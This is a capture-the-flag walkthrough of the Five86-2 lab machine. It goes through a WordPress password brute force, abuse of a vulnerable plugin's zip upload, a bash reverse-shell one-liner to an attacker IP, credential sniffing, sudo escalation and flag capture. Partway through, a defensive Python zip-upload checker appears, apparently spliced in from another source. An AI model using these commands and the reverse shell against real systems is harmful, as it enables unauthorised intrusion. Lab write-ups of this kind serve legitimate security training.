Five86–2 CTF WALKTHROUGH

Walk-throughs
Jun 29, 2021

The IP address provided for the target is 172.16.30.88.

I did an nmap scan on this to find more information on it using `nmap -sS -Pn --script vuln -p- 172.16.30.88`. To explain the scan: -sS runs a SYN (stealth) scan, -Pn skips host discovery and treats the host as up, --script vuln runs the vuln script category, and -p- scans all ports.

The following screenshot shows the results of the scan.

Using wpscan to enumerate users

Command: `wpscan --url http://172.16.30.88/ --enumerate u`

With the above information I created a user list and saved it as userfile.txt.

We now know it is a WordPress web app with various usernames provided. We can visit the IP via our browser to see if we can find any information there. I made use of the wpscan tool to brute-force the user passwords.

Command: `wpscan --url http://172.16.30.88 -U userfile.txt -P /usr/share/wordlists/rockyou.txt`

So far I've found two passwords: barney = spooky1 and stephen = apollo1.

We can try logging in to WordPress using the above credentials.

It was a hell of a problem accessing it. Upon research, I realized I needed to add this domain to the /etc/hosts file, which I did, and it became easier to access.

A glimpse of the dashboard

There are three plugins, one of which is known to have vulnerabilities, as shown below. The vulnerable plugin is 'Insert or Embed Articulate Content into WordPress'.

Exploit-DB provides a method to exploit this plugin, which I followed.

Method:

1. Create a .zip with two files: index.html and shell.php (script to set up netcat).

2. Upload this file to WordPress using barney's account. This will be added as an e-learning block on the Add New Post menu, as it allows zipped files.

We insert the file as an iframe; it's the free option.

Our upload path is visible on the dashboard: /wp-content/uploads/articulate_uploads/word10/index.html. We can put this in the browser and see the outcome; we'll change index.html to index.php because that is where our script is.
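The root cause here is that the plugin unpacks a user-supplied zip straight into a web-served uploads directory without inspecting its contents. The following check, added here as an example and not code from the walkthrough or from the plugin, shows what a defender would want that upload handler to do before extracting anything: refuse archives that carry server-side scripts (including double-extension tricks) or path-traversal entries. The sample zips are constructed inline to mirror the package described above (index.html plus a PHP file); the function name is my own.

```python
import io
import posixpath
import zipfile
from typing import Dict, List

# Extensions the web server would execute if they landed under wp-content/uploads.
BLOCKED_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar", ".phps"}


def check_articulate_zip(data: bytes) -> List[str]:
    """Return the problems found in an uploaded zip; an empty list means it is safe to unpack."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            # Zip-slip: absolute paths or a leading '..' after normalisation escape the upload dir.
            norm = posixpath.normpath(name)
            if name.startswith(("/", "\\")) or norm == ".." or norm.startswith("../"):
                problems.append(f"path traversal: {name}")
            # Direct server-side script, e.g. shell.php.
            if posixpath.splitext(name)[1].lower() in BLOCKED_EXTENSIONS:
                problems.append(f"server-side script: {name}")
            # Double extensions such as shell.php.html still execute under some Apache configs.
            parts = posixpath.basename(name).lower().split(".")
            if any(("." + p) in BLOCKED_EXTENSIONS for p in parts[1:-1]):
                problems.append(f"embedded script extension: {name}")
    return problems


def build_sample_zip(entries: Dict[str, bytes]) -> bytes:
    """Build an in-memory zip from a name -> content mapping (test fixture helper)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples: one mirrors the walkthrough's package, one is a benign e-learning export.
MALICIOUS = build_sample_zip({"index.html": b"<html></html>", "shell.php": b"<?php /* placeholder */ ?>"})
CLEAN = build_sample_zip({"index.html": b"<html></html>", "story_content/data.js": b"var x = 1;"})

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS), ("clean", CLEAN)):
        print(label, check_articulate_zip(blob) or "OK")
```

The same check flags the index.php rename trick, since it is the extension, not the file name, that decides whether the server executes the file.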

Checking whoami with our script.

To try and gain root privilege, I need some kind of a shell so I checked whether netcat was a viable option.

To test whether netcat is available, I added the command `cmd=man nc`.

nc manpage

With this information, I created a PHP script and uploaded it to WordPress using the same technique as above.

Script: `<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.20/1234 0>&1'");`

It doesn't seem to work.

It could be the firewall, so we try allowing our port 1234 and see if we can find anything. It works!

We first run `tcpdump -D` to identify the interfaces that are up and running, then inspect packets from the veth interface.

Running `tcpdump -r cap.pcap` to see the traffic captured, we find a new user, paul, with the password esomepasswford.

We now switch to the paul account.

Find out if Paul has sudo rights.

I identified that Paul could run the above service as user peter with no password required, and I went ahead to get that shell.

We now exploit peter, since he has all the permissions, so we can change the root password and get our flag.

cat the contents of the flag2.txt file.

The flag is Delta{jghj*&(^$^BV%^}

Since we are root, we can now navigate to the home directories of other users and see what we can find. Since our challenge hints that gillian has the flag, we navigate to user gillian's home and see what we can find.

The flag here is Delta{D&hj189Hv&G(jh67##}

Submit and get your reward!!
